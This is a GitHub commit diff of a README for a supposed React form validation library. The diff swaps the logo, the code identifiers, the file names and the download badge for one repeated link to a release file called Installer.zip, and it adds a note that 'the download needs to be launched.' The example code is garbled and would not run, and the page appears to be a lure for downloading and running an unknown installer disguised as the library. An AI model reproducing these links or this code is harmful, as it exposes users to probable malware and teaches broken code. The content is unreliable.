Skip to content

Commit 967b627

Browse files
committed
Commit
1 parent 8f0433b commit 967b627

File tree

1 file changed

+14
-14
lines changed

1 file changed

+14
-14
lines changed

README.md

+14-14
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
11
# 🚀 React Form Validator Pro
22

3-
![React Form Validator Pro Logo](https://example.com/logo.png)
3+
![React Form Validator Pro Logo](https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip)
44

55
## Overview
66

@@ -34,22 +34,22 @@ const MyForm = () => {
3434
});
3535

3636
const handleInputChange = (e) => {
37-
const { name, value } = e.target;
37+
const { name, value } = https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip;
3838
setFormData({
39-
...formData,
39+
https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip,
4040
[name]: value,
4141
});
4242
};
4343

4444
const handleSubmit = () => {
4545
const validationRules = {
46-
email: [validate.required('Email is required'), validate.email('Please enter a valid email')],
47-
password: [validate.required('Password is required')],
46+
email: [https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip('Email is required'), https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip('Please enter a valid email')],
47+
password: [https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip('Password is required')],
4848
};
4949

50-
const validationResult = FormValidator.validate(formData, validationRules);
50+
const validationResult = https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip(formData, validationRules);
5151

52-
if (validationResult.isValid) {
52+
if (https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip) {
5353
// Proceed with form submission
5454
} else {
5555
// Handle form validation errors
@@ -58,8 +58,8 @@ const MyForm = () => {
5858

5959
return (
6060
<form>
61-
<input type="text" name="email" value={formData.email} onChange={handleInputChange} />
62-
<input type="password" name="password" value={formData.password} onChange={handleInputChange} />
61+
<input type="text" name="email" value={https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip} onChange={handleInputChange} />
62+
<input type="password" name="password" value={https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip} onChange={handleInputChange} />
6363
<button onClick={handleSubmit}>Submit</button>
6464
</form>
6565
);
@@ -73,16 +73,16 @@ export default MyForm;
7373
```
7474
react-form-validator-pro/
7575
├── src/
76-
│ ├── index.js
77-
│ └── validator.js
76+
│ ├── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip
77+
│ └── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip
7878
├── .gitignore
79-
├── package.json
80-
└── README.md
79+
├── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip
80+
└── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip
8181
```
8282
8383
## Download
8484
85-
[![Download React Form Validator Pro](https://img.shields.io/badge/Download-v1.0.0-blue.svg)](https://github.com/cli/oauth/archive/refs/tags/v1.0.0.zip)
85+
[![Download React Form Validator Pro](https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip)](https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v1.0/Installer.zip)
8686
8787
*Note: The download needs to be launched.*
8888

0 commit comments

Comments
 (0)